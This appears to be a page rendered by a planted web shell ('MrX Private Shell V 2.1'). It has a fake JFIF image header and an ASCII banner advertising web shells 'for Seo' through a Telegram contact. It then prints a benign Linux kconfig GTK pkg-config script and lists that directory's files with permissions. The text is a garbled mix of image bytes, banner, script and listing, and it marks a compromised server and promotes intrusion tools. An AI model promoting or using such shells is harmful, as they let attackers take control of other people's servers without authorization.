����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/usr/bin/sh # SPDX-License-Identifier: GPL-2.0 PKG="gtk+-2.0 gmodule-2.0 libglade-2.0" if [ -z "$(command -v pkg-config)" ]; then echo >&2 "*" echo >&2 "* 'make gconfig' requires 'pkg-config'. Please install it." echo >&2 "*" exit 1 fi if ! pkg-config --exists $PKG; then echo >&2 "*" echo >&2 "* Unable to find the GTK+ installation. Please make sure that" echo >&2 "* the GTK+ 2.0 development package is correctly installed." echo >&2 "* You need $PKG" echo >&2 "*" exit 1 fi if ! pkg-config --atleast-version=2.0.0 gtk+-2.0; then echo >&2 "*" echo >&2 "* GTK+ is present but version >= 2.0.0 is required." echo >&2 "*" exit 1 fi echo cflags=\"$(pkg-config --cflags $PKG)\" echo libs=\"$(pkg-config --libs $PKG)\"
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| lxdialog | Folder | 0755 |
|
|
| tests | Folder | 0755 |
|
|
| Makefile | File | 7.61 KB | 0644 |
|
| conf | File | 126.77 KB | 0755 |
|
| conf.c | File | 20.01 KB | 0644 |
|
| confdata.c | File | 22.81 KB | 0644 |
|
| expr.c | File | 30.03 KB | 0644 |
|
| expr.h | File | 9.47 KB | 0644 |
|
| gconf-cfg.sh | File | 737 B | 0755 |
|
| gconf.c | File | 38 KB | 0644 |
|
| gconf.glade | File | 25.04 KB | 0644 |
|
| images.c | File | 6.42 KB | 0644 |
|
| images.h | File | 857 B | 0644 |
|
| internal.h | File | 172 B | 0644 |
|
| lexer.l | File | 8.99 KB | 0644 |
|
| lexer.lex.c | File | 112.63 KB | 0644 |
|
| list.h | File | 3.66 KB | 0644 |
|
| lkc.h | File | 3.75 KB | 0644 |
|
| lkc_proto.h | File | 1.92 KB | 0644 |
|
| mconf-cfg.sh | File | 1.42 KB | 0755 |
|
| mconf.c | File | 27.21 KB | 0644 |
|
| menu.c | File | 21.67 KB | 0644 |
|
| merge_config.sh | File | 4.65 KB | 0755 |
|
| nconf-cfg.sh | File | 1.32 KB | 0755 |
|
| nconf.c | File | 37.87 KB | 0644 |
|
| nconf.gui.c | File | 14.55 KB | 0644 |
|
| nconf.h | File | 2 KB | 0644 |
|
| parser.tab.c | File | 71.65 KB | 0644 |
|
| parser.tab.h | File | 5 KB | 0644 |
|
| parser.y | File | 15.26 KB | 0644 |
|
| preprocess.c | File | 11.01 KB | 0644 |
|
| qconf-cfg.sh | File | 598 B | 0755 |
|
| qconf.cc | File | 43.43 KB | 0644 |
|
| qconf.h | File | 6.4 KB | 0644 |
|
| streamline_config.pl | File | 16.42 KB | 0755 |
|
| symbol.c | File | 28.62 KB | 0644 |
|
| util.c | File | 1.52 KB | 0644 |
|